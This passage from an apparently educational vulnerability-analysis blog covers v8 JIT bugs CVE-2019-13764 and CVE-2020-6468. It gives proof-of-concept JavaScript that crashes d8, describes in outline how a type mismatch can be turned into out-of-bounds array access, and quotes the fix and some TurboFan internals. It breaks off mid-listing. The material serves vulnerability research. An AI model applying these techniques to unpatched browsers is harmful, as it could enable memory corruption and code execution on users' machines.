class="comment">;; de<span class="doctag">bug:</span> deopt position, script offset &#x27;190&#x27;</span></span><br><span class="line">                                                                   <span class="comment">;; de<span class="doctag">bug:</span> deopt position, inlining id &#x27;-1&#x27;</span></span><br><span class="line">                                                                   <span class="comment">;; debug: deopt reason &#x27;wrong call target&#x27;</span></span><br><span class="line">                                                                   <span class="comment">;; debug: deopt index 1</span></span><br><span class="line"><span class="number">0x118a80d82f38</span>   <span class="number">118</span>  e803f10300           <span class="keyword">call</span> <span class="number">0x118a80dc2040</span>     <span class="comment">;; eager deoptimization bailout</span></span><br><span class="line"><span class="number">0x118a80d82f3d</span>   <span class="number">11d</span>  49c7c502000000       REX<span class="number">.</span>W <span class="keyword">movq</span> <span class="built_in">r13</span>,<span class="number">0x2</span>      <span class="comment">;; de<span class="doctag">bug:</span> deopt position, script offset &#x27;152&#x27;</span></span><br><span class="line">                                                                   <span class="comment">;; de<span class="doctag">bug:</span> deopt position, inlining id &#x27;-1&#x27;</span></span><br><span class="line">                                                                   <span class="comment">;; debug: deopt reason &#x27;(unknown)&#x27;</span></span><br><span class="line">                                                                   <span class="comment">;; debug: deopt index 2</span></span><br><span class="line"><span class="number">0x118a80d82f44</span>   <span class="number">124</span>  e8f7f00700           <span class="keyword">call</span> <span 
class="number">0x118a80e02040</span>     <span class="comment">;; lazy deoptimization bailout</span></span><br><span class="line"><span class="number">0x118a80d82f49</span>   <span class="number">129</span>  49c7c503000000       REX<span class="number">.</span>W <span class="keyword">movq</span> <span class="built_in">r13</span>,<span class="number">0x3</span>      <span class="comment">;; de<span class="doctag">bug:</span> deopt position, script offset &#x27;37&#x27;</span></span><br><span class="line">                                                                   <span class="comment">;; de<span class="doctag">bug:</span> deopt position, inlining id &#x27;0&#x27;</span></span><br><span class="line">                                                                   <span class="comment">;; debug: deopt reason &#x27;(unknown)&#x27;</span></span><br><span class="line">                                                                   <span class="comment">;; debug: deopt index 3</span></span><br><span class="line"><span class="number">0x118a80d82f50</span>   <span class="number">130</span>  e8ebf00700           <span class="keyword">call</span> <span class="number">0x118a80e02040</span>     <span class="comment">;; lazy deoptimization bailout</span></span><br><span class="line"><span class="number">0x118a80d82f55</span>   <span class="number">135</span>  0f1f00               <span class="keyword">nop</span></span><br></pre></td></tr></table></figure></li><li><p>The regression test given in the Issue (which also serves as the PoC) is as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span 
class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">function <span class="title">write</span><span class="params">(begin, end, step)</span> </span>&#123;</span><br><span class="line">  <span class="keyword">for</span> (var i = begin; i &gt;= end; i += step) &#123;</span><br><span class="line">    step = end - begin;</span><br><span class="line">    begin &gt;&gt;&gt;= <span class="number">805306382</span>;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function">function <span class="title">bar</span><span class="params">()</span> </span>&#123;</span><br><span class="line">  <span class="keyword">for</span> (let i = <span class="number">0</span>; i &lt; <span class="number">10000</span>; i++) &#123;</span><br><span class="line">    <span class="built_in">write</span>(Infinity, <span class="number">1</span>, <span class="number">1</span>);</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">%<span class="built_in">PrepareFunctionForOptimization</span>(write);</span><br><span class="line">%<span class="built_in">PrepareFunctionForOptimization</span>(bar);</span><br><span class="line"><span class="built_in">bar</span>();</span><br><span class="line">%<span class="built_in">OptimizeFunctionOnNextCall</span>(bar);</span><br><span class="line"><span class="built_in">bar</span>();</span><br></pre></td></tr></table></figure><p>This successfully triggers SIGTRAP:</p><p><img src="/2021/02/CVE-2019-13764/sigtrap.png" alt="img"></p><p>In Turbolizer, we can see that the range of the induction variable <code>i</code> is <code>-inf ~ inf</code>.</p><blockquote><p>A loop can contain several Phi nodes. In the PoC, the values of begin, i, and step each flow in from both inside and outside the loop, so they are Phi nodes.</p></blockquote><p><img src="/2021/02/CVE-2019-13764/phi1.png" alt="img"><br>The detailed output is shown below. The ranges of bound_type, initial_type, and increment_type match our expectations: the bound value and initial value are the <code>1</code> and <code>Infinity</code> passed to the write function, and the increment value is $1 - inf = -inf$. The range of the induction variable <code>i</code>, however, is incorrectly set to <code>-inf ~ inf</code> rather than <code>inf ~ inf</code>.</p><p>Note also that at this point <code>initial_type value + increment_type value = inf + (-inf) = NaN</code>.</p><blockquote><p>Part of the output below was produced after applying the patch.</p></blockquote><p><img src="/2021/02/CVE-2019-13764/output.png" alt="img"></p></li><li><p>With the root cause understood, we can modify the PoC slightly to see the details more clearly:</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">function</span> <span class="title function_">write</span>(<span class="params">step</span>) &#123;</span><br><span class="line">  step = -<span class="title class_">Infinity</span>;</span><br><span class="line">  <span class="comment">/*</span></span><br><span class="line"><span class="comment">    initial_type   range =&gt; inf ~ inf</span></span><br><span class="line"><span class="comment">    bounds_type    range =&gt; 1 ~ 1</span></span><br><span class="line"><span class="comment">    increment_type range =&gt; -inf ~ 
inf</span></span><br><span class="line"><span class="comment">    =&gt; i           range =&gt; -inf ~ inf</span></span><br><span class="line"><span class="comment">  */</span></span><br><span class="line">  <span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="title class_">Infinity</span>; i &gt;= <span class="number">1</span>; i += -<span class="title class_">Infinity</span>) &#123;&#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">bar</span>(<span class="params"></span>) &#123;</span><br><span class="line">  <span class="keyword">for</span> (<span class="keyword">let</span> i = <span class="number">0</span>; i &lt; <span class="number">10000</span>; i++) &#123;</span><br><span class="line">    <span class="title function_">write</span>(<span class="number">1</span>);</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">%<span class="title class_">PrepareFunctionForOptimization</span>(write);</span><br><span class="line">%<span class="title class_">PrepareFunctionForOptimization</span>(bar);</span><br><span class="line"><span class="title function_">bar</span>();</span><br><span class="line">%<span class="title class_">OptimizeFunctionOnNextCall</span>(bar);</span><br><span class="line"><span class="title function_">bar</span>();</span><br></pre></td></tr></table></figure></li></ul><h2 id="四、漏洞利用">IV. Exploitation</h2><ul><li><p>I originally thought this bug was of little practical use, until I ran into its follow-up bug: <a href="https://bugs.chromium.org/p/chromium/issues/detail?id=1051017">Issue 1051017: Security: Type inference issue in Typer::Visitor::TypeInductionVariablePhi</a></p><p>Briefly: with a simple bypass, we can make the InductionVariable's value NaN while its type is kInteger. TurboFan's inferred type then disagrees with the actual runtime value, and we can build an exploit on that mismatch to achieve OOB access.</p><p>Because an earlier patch changed how CheckBounds is optimized, we can no longer get out-of-bounds reads and writes by having CheckBounds optimized away. We can, however, abuse the optimization in <code>ReduceJSCreateArray</code>. That function uses the <strong>inferred value</strong> of length to size the backing_store, but at runtime it stores the <strong>runtime value</strong> of length into the array's length field. If the <strong>inferred value</strong> of length is smaller than the <strong>runtime value</strong>, OOB access becomes possible.</p></li><li><p>For more details, see the Issue linked above; the exploitation details there are thorough, so I won't repeat them here.</p></li></ul><h2 id="五、后记">V. Afterword</h2><ul><li><p>The fix is in this <a href="https://chromium.googlesource.com/v8/v8.git/+/b8b6075021ade0969c6b8de9459cd34163f7dbe1%5E%21/#F1">revision</a>, which adds a check for NaN.</p><p>If combining initial_type and increment_type may produce NaN, the analysis falls back to the more conservative Phi typing.</p><blockquote><p>Note that this patch still does not cover every possible NaN case. For details, see <a href="https://bugs.chromium.org/p/chromium/issues/detail?id=1051017">Issue 1051017: Security: Type inference issue in Typer::Visitor::TypeInductionVariablePhi</a></p></blockquote><figure class="highlight diff"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span 
class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@@ -847,13 +847,30 @@</span></span><br><span class="line">   DCHECK_EQ(IrOpcode::kLoop, NodeProperties::GetControlInput(node)-&gt;opcode());</span><br><span class="line">   DCHECK_EQ(2, NodeProperties::GetControlInput(node)-&gt;InputCount());</span><br><span class="line"> </span><br><span class="line"><span class="addition">+  auto res = induction_vars_-&gt;induction_variables().find(node-&gt;id());</span></span><br><span class="line"><span class="addition">+  DCHECK(res != induction_vars_-&gt;induction_variables().end());</span></span><br><span class="line"><span class="addition">+  InductionVariable* induction_var = res-&gt;second;</span></span><br><span class="line"><span class="addition">+  InductionVariable::ArithmeticType arithmetic_type = induction_var-&gt;Type();</span></span><br><span class="line">   Type initial_type = Operand(node, 0);</span><br><span class="line">   Type increment_type = Operand(node, 2);</span><br><span class="line"> </span><br><span class="line"><span class="addition">+  const bool both_types_integer = initial_type.Is(typer_-&gt;cache_-&gt;kInteger) &amp;&amp;</span></span><br><span class="line"><span class="addition">+                                  increment_type.Is(typer_-&gt;cache_-&gt;kInteger);</span></span><br><span class="line">   // Note: a check for NaN is added here</span><br><span class="line"><span class="addition">+  bool maybe_nan = false;</span></span><br><span class="line"><span class="addition">+  // The addition or subtraction could still produce a NaN, if the integer</span></span><br><span 
class="line"><span class="addition">+  // ranges touch infinity.</span></span><br><span class="line"><span class="addition">+  if (both_types_integer) &#123;</span></span><br><span class="line"><span class="addition">+    Type resultant_type =</span></span><br><span class="line"><span class="addition">+        (arithmetic_type == InductionVariable::ArithmeticType::kAddition)</span></span><br><span class="line"><span class="addition">+            ? typer_-&gt;operation_typer()-&gt;NumberAdd(initial_type, increment_type)</span></span><br><span class="line"><span class="addition">+            : typer_-&gt;operation_typer()-&gt;NumberSubtract(initial_type,</span></span><br><span class="line"><span class="addition">+                                                        increment_type);</span></span><br><span class="line"><span class="addition">+    maybe_nan = resultant_type.Maybe(Type::NaN());</span></span><br><span class="line"><span class="addition">+  &#125;</span></span><br><span class="line"><span class="addition">+</span></span><br><span class="line">   // We only handle integer induction variables (otherwise ranges</span><br><span class="line">   // do not apply and we cannot do anything).</span><br><span class="line"><span class="deletion">-  if (!initial_type.Is(typer_-&gt;cache_-&gt;kInteger) ||</span></span><br><span class="line"><span class="deletion">-      !increment_type.Is(typer_-&gt;cache_-&gt;kInteger)) &#123;</span></span><br><span class="line">   // Note: NaN handling is added here; the NaN case takes the conservative path.</span><br><span class="line"><span class="addition">+  if (!both_types_integer || maybe_nan) &#123;</span></span><br><span class="line">     // Fallback to normal phi typing, but ensure monotonicity.</span><br><span class="line">     // (Unfortunately, without baking in the previous type, monotonicity might</span><br><span class="line">     // be violated because we might not yet have retyped the incrementing</span><br><span class="line"><span class="meta">@@ 
-874,12 +891,6 @@</span></span><br><span class="line">   &#125;</span><br><span class="line"> </span><br><span class="line">   // Now process the bounds.</span><br><span class="line"><span class="deletion">-  auto res = induction_vars_-&gt;induction_variables().find(node-&gt;id());</span></span><br><span class="line"><span class="deletion">-  DCHECK(res != induction_vars_-&gt;induction_variables().end());</span></span><br><span class="line"><span class="deletion">-  InductionVariable* induction_var = res-&gt;second;</span></span><br><span class="line"><span class="deletion">-</span></span><br><span class="line"><span class="deletion">-  InductionVariable::ArithmeticType arithmetic_type = induction_var-&gt;Type();</span></span><br><span class="line"><span class="deletion">-</span></span><br><span class="line">   double min = -V8_INFINITY;</span><br><span class="line">   double max = V8_INFINITY;</span><br></pre></td></tr></table></figure></li></ul><h2 id="六、参考">VI. References</h2><ul><li><p><a href="https://bugs.chromium.org/p/chromium/issues/detail?id=1028863">Issue 1028863: v8: Wrong JIT code that triggers SIGTRAP at runtime</a></p></li><li><p><a href="https://bugs.chromium.org/p/chromium/issues/detail?id=1051017">Issue 1051017: Security: Type inference issue in Typer::Visitor::TypeInductionVariablePhi</a></p></li></ul>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;一、前言&quot;&gt;I. Preface&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;CVE-2019-13764 is a vulnerability in v8's JIT TyperPhase, located in the &lt;code&gt;TypeInductionVariablePhi&lt;/code&gt; function. We can use it as an example to learn how TyperPhase handles InductionVariablePhi, and how an out-of-bounds read can be constructed.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;The v8 version used for reproduction is &lt;code&gt;7.8.279.23&lt;/code&gt; (chromium 78.0.3904.108).&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;</summary>
    
    
    
    <category term="vulnerability analysis" scheme="https://kiprey.github.io/categories/vulnerability-analysis/"/>
    
    <category term="v8" scheme="https://kiprey.github.io/categories/vulnerability-analysis/v8/"/>
    
    
    <category term="v8" scheme="https://kiprey.github.io/tags/v8/"/>
    
  </entry>
  
  <entry>
    <title>CVE-2020-6468 Analysis</title>
    <link href="https://kiprey.github.io/2021/02/CVE-2020-6468/"/>
    <id>https://kiprey.github.io/2021/02/CVE-2020-6468/</id>
    <published>2021-02-09T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:39.765Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、前言">I. Preface</h2><ul><li><p>CVE-2020-6468 is a JIT vulnerability in v8, located in the <code>DeadCodeElimination::ReduceDeoptimizeOrReturnOrTerminateOrTailCall</code> function. It lets an attacker <strong>trigger a type confusion</strong> and <strong>modify an array's length</strong>, which leads to <strong>arbitrary out-of-bounds reads and writes</strong> and can be escalated further to <strong>RCE</strong>.</p><p>Specifically, -1 can be written into the target object ahead of the CheckMaps node, so the array length is modified before the object's type has been checked.</p></li><li><p>The v8 version used for testing is <code>8.1.307</code>.</p></li></ul><span id="more"></span><ul><li>This is my first time studying a type confusion bug in the JIT, so there may be mistakes or unclear passages; corrections are welcome.</li></ul><h2 id="二、环境搭建">II. Environment Setup</h2><ul><li><p>Check out the target v8 version, then build it:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">git checkout 8.1.307</span><br><span class="line">gclient <span class="built_in">sync</span></span><br><span class="line">tools/dev/v8gen.py x64.debug</span><br><span class="line">ninja -C out.gn/x64.debug  </span><br></pre></td></tr></table></figure></li><li><p>Start turbolizer. If the turbolizer that ships with this version does not work, the online turbolizer for <a href="https://v8.github.io/tools/v8.1/turbolizer/index.html">v8.1</a> can be used instead.</p><blockquote><p>The root directory of the v8 tools is <a href="https://v8.github.io/tools">here</a>.</p></blockquote></li></ul><h2 id="三、漏洞细节">III. Vulnerability Details</h2><h3 id="1-前置知识">1. Prerequisites</h3><h4 id="a-PrepareFunctionForOptimization">a. 
%PrepareFunctionForOptimization</h4><ul><li><p>v8 ships with a number of runtime functions. Passing <code>--allow-natives-syntax</code> when starting d8 enables their use.</p></li><li><p><code>%PrepareFunctionForOptimization</code> is one of these built-in functions. It prepares a function for JIT optimization by ensuring that the JSFunction has a FeedbackVector and related structures (compiling the function first if necessary).</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// The call chain is as follows</span></span><br><span class="line"><span class="function">Runtime_PrepareFunctionForOptimization</span></span><br><span class="line"><span class="function">  <span class="type">bool</span> <span class="title">EnsureFeedbackVector</span><span class="params">(Handle&lt;JSFunction&gt; function)</span></span></span><br><span class="line"><span class="function">    <span class="type">void</span> <span class="title">JSFunction::EnsureFeedbackVector</span><span class="params">(Handle&lt;JSFunction&gt; function)</span></span></span><br></pre></td></tr></table></figure></li><li><p>Because this built-in only <strong>prepares the FeedbackVector</strong> for the corresponding JSFunction (keep this preparation step in mind), <strong>calling the target function several times</strong> prepares the FeedbackVector just as well and can replace the call to the built-in.</p></li></ul><h4 id="b-JIT-kThrow结点">b. 
JIT kThrow node</h4><p>Nodes of type <code>Throw</code> are added to the BytecodeGraph through the following call chain:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">BytecodeGraphBuilder::BuildGraphFromBytecode</span><span class="params">(...)</span></span></span><br><span class="line"><span class="function">    <span class="type">void</span> <span class="title">BytecodeGraphBuilder::CreateGraph</span><span class="params">()</span></span></span><br><span class="line"><span class="function">      <span class="type">void</span> <span class="title">BytecodeGraphBuilder::VisitBytecodes</span><span class="params">()</span></span></span><br><span class="line"><span class="function">        <span class="type">void</span> <span class="title">BytecodeGraphBuilder::VisitSingleBytecode</span><span class="params">()</span></span></span><br><span class="line"><span class="function">          <span class="type">void</span> <span class="title">BytecodeGraphBuilder::VisitThrow</span><span class="params">()</span> \</span></span><br><span class="line"><span class="function">          <span class="type">void</span> <span class="title">BytecodeGraphBuilder::VisitAbort</span><span class="params">()</span> \</span></span><br><span class="line"><span class="function">          <span class="type">void</span> <span class="title">BytecodeGraphBuilder::VisitReThrow</span><span class="params">()</span></span></span><br></pre></td></tr></table></figure><p>We can insert a <code>throw</code> statement directly into the JS code to generate a <code>Throw</code> bytecode:</p><p><img src="/2021/02/CVE-2020-6468/throw_bytecode.png" alt="img"></p><p>In fact, Throw nodes appear frequently in v8. Ultimately this is because TurboFan replaces nodes that control flow can never reach with throw nodes, much like the way <code>UNREACHABLE</code> is used in v8's C++ code.</p><h4 id="c-JIT-kTerminate-结点">c. JIT kTerminate node</h4><ul><li><p>Nodes of type <code>Terminate</code> are added to the BytecodeGraph through the following call chain:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">BytecodeGraphBuilder::BuildGraphFromBytecode</span><span class="params">(...)</span></span></span><br><span class="line"><span class="function">    <span class="type">void</span> <span class="title">BytecodeGraphBuilder::CreateGraph</span><span class="params">()</span></span></span><br><span class="line"><span class="function">      <span class="type">void</span> <span class="title">BytecodeGraphBuilder::VisitBytecodes</span><span class="params">()</span></span></span><br><span class="line"><span class="function">        <span class="type">void</span> <span class="title">BytecodeGraphBuilder::VisitSingleBytecode</span><span class="params">()</span></span></span><br><span class="line"><span class="function">          <span class="type">void</span> <span class="title">BytecodeGraphBuilder::BuildLoopHeaderEnvironment</span><span class="params">(<span class="type">int</span>)</span></span></span><br><span class="line"><span class="function">            <span class="type">void</span> BytecodeGraphBuilder::<span class="title">Environment::PrepareForLoop</span><span class="params">(...)</span></span></span><br></pre></td></tr></table></figure><p>The code that adds it is shown below:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span 
class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">void</span> BytecodeGraphBuilder::Environment::<span class="built_in">PrepareForLoop</span>(</span><br><span class="line">    <span class="type">const</span> BytecodeLoopAssignments&amp; assignments,</span><br><span class="line">    <span class="type">const</span> BytecodeLivenessState* liveness) &#123;</span><br><span class="line">  <span class="comment">// Create a control node for the loop header.</span></span><br><span class="line">  Node* control = <span class="built_in">builder</span>()-&gt;<span class="built_in">NewLoop</span>();</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Build the Phi-related nodes</span></span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line">    </span><br><span class="line">  <span class="comment">// The accumulator should not be live on entry.</span></span><br><span class="line"></span><br><span class="line">  <span class="comment">// Connect to the loop end.</span></span><br><span class="line">  <span class="comment">// The terminate node is added here</span></span><br><span class="line">  Node* terminate = <span class="built_in">builder</span>()-&gt;<span class="built_in">graph</span>()-&gt;<span class="built_in">NewNode</span>(</span><br><span class="line">      <span class="built_in">builder</span>()-&gt;<span class="built_in">common</span>()-&gt;<span class="built_in">Terminate</span>(), effect, control);</span><br><span class="line">  <span class="built_in">builder</span>()-&gt;exit_controls_.<span class="built_in">push_back</span>(terminate);</span><br><span 
class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>Note, however, that running <code>BuildGraphFromBytecode</code> does not by itself guarantee that a terminate node is added. The addition is guarded by a condition: a terminate node is added only for a bytecode that is a LoopHeader:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">BytecodeGraphBuilder::BuildLoopHeaderEnvironment</span><span class="params">(<span class="type">int</span> current_offset)</span> </span>&#123;</span><br><span class="line">  <span class="comment">// Note this condition</span></span><br><span class="line">  <span class="keyword">if</span> (<span class="built_in">bytecode_analysis</span>().<span class="built_in">IsLoopHeader</span>(current_offset)) &#123;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line"></span><br><span class="line">    <span class="comment">// Add loop header.</span></span><br><span class="line">    <span class="built_in">environment</span>()-&gt;<span class="built_in">PrepareForLoop</span>(loop_info.<span class="built_in">assignments</span>(), liveness);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>To <strong>satisfy this LoopHeader condition</strong>, we need to dig further. A LoopHeader is actually added to the BytecodeAnalysis instance through the following call chain:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span 
class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">BytecodeGraphBuilder::BuildGraphFromBytecode</span><span class="params">(...)</span></span></span><br><span class="line"><span class="function">    <span class="title">BytecodeGraphBuilder::BytecodeGraphBuilder</span><span class="params">(...)</span></span></span><br><span class="line"><span class="function">      BytecodeAnalysis <span class="type">const</span>&amp; <span class="title">JSHeapBroker::GetBytecodeAnalysis</span><span class="params">(...)</span></span></span><br><span class="line"><span class="function">        <span class="title">BytecodeAnalysis::BytecodeAnalysis</span><span class="params">(...)</span></span></span><br><span class="line"><span class="function">          <span class="type">void</span> <span class="title">BytecodeAnalysis::Analyze</span><span class="params">()</span></span></span><br><span class="line"><span class="function">            <span class="type">void</span> <span class="title">BytecodeAnalysis::PushLoop</span><span class="params">(...)</span> <span class="comment">// registers the LoopHeader</span></span></span><br></pre></td></tr></table></figure><p>Auditing the code of BytecodeAnalysis::Analyze shows that a LoopHeader is registered in the BytecodeAnalysis instance only when the bytecode is <code>Bytecode::kJumpLoop</code>:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span 
class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">BytecodeAnalysis::Analyze</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">    <span class="comment">// Iterate over the bytecode</span></span><br><span class="line">    <span class="function">interpreter::BytecodeArrayRandomIterator <span class="title">iterator</span><span class="params">(bytecode_array(), zone())</span></span>;</span><br><span class="line">    <span class="keyword">for</span> (iterator.<span class="built_in">GoToEnd</span>(); iterator.<span class="built_in">IsValid</span>(); --iterator) &#123;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">        <span class="comment">// When the bytecode is JumpLoop</span></span><br><span class="line">        <span class="keyword">if</span> (bytecode == Bytecode::kJumpLoop) &#123;</span><br><span class="line">          <span class="comment">// Every byte up to and including the last byte within the backwards jump</span></span><br><span class="line">          <span class="comment">// instruction is considered part of the loop, set loop end accordingly.</span></span><br><span class="line">          <span class="type">int</span> loop_end = current_offset + iterator.<span class="built_in">current_bytecode_size</span>();</span><br><span class="line">          <span class="type">int</span> loop_header = iterator.<span class="built_in">GetJumpTargetOffset</span>();</span><br><span class="line">          <span class="comment">// Register the LoopHeader</span></span><br><span class="line">          <span 
class="built_in">PushLoop</span>(loop_header, loop_end);</span><br><span class="line">          <span class="comment">// ...</span></span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">// ...</span></span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>So what kind of JS code produces bytecode containing <code>Bytecode::kJumpLoop</code>? Testing shows that <strong>every loop produces a <code>JumpLoop</code> bytecode</strong>. <code>JumpLoop</code> is not much different from the JMP instruction at the end of a loop in assembly; the V8 bytecode simply marks explicitly that <strong>this jump goes back into the loop</strong>.</p><p>Here is a JS snippet used for testing:</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">for</span>(<span class="keyword">let</span> a = <span class="number">0</span>; a &lt; ii; a++)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="variable language_">console</span>.<span class="title function_">log</span>(ii);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>The corresponding generated bytecode:</p><figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span 
class="line"><span class="number">15</span> E&gt; <span class="number">0x11ce08250232</span> @    <span class="number">0</span> : a7                StackCheck </span><br><span class="line"><span class="number">38</span> S&gt; <span class="number">0x11ce08250233</span> @    <span class="number">1</span> : <span class="number">0b</span>                LdaZero </span><br><span class="line">      <span class="number">0x11ce08250234</span> @    <span class="number">2</span> : <span class="number">26</span> fb             Star <span class="built_in">r0</span></span><br><span class="line"><span class="number">43</span> S&gt; <span class="number">0x11ce08250236</span> @    <span class="number">4</span> : <span class="number">25</span> <span class="number">02</span>             Ldar a0</span><br><span class="line"><span class="number">43</span> E&gt; <span class="number">0x11ce08250238</span> @    <span class="number">6</span> : <span class="number">69</span> fb <span class="number">00</span>          TestLessThan <span class="built_in">r0</span>, [<span class="number">0</span>]</span><br><span class="line">      <span class="number">0x11ce0825023b</span> @    <span class="number">9</span> : 9a 1c             JumpIfFalse [<span class="number">28</span>] (<span class="number">0x11ce08250257</span> @ <span class="number">37</span>)</span><br><span class="line"><span class="number">26</span> E&gt; <span class="number">0x11ce0825023d</span> @   <span class="number">11</span> : a7                StackCheck </span><br><span class="line"><span class="number">68</span> S&gt; <span class="number">0x11ce0825023e</span> @   <span class="number">12</span> : <span class="number">13</span> <span class="number">00</span> <span class="number">01</span>          LdaGlobal [<span class="number">0</span>], [<span class="number">1</span>]</span><br><span class="line">      <span class="number">0x11ce08250241</span> @   <span class="number">15</span> : <span class="number">26</span> f9          
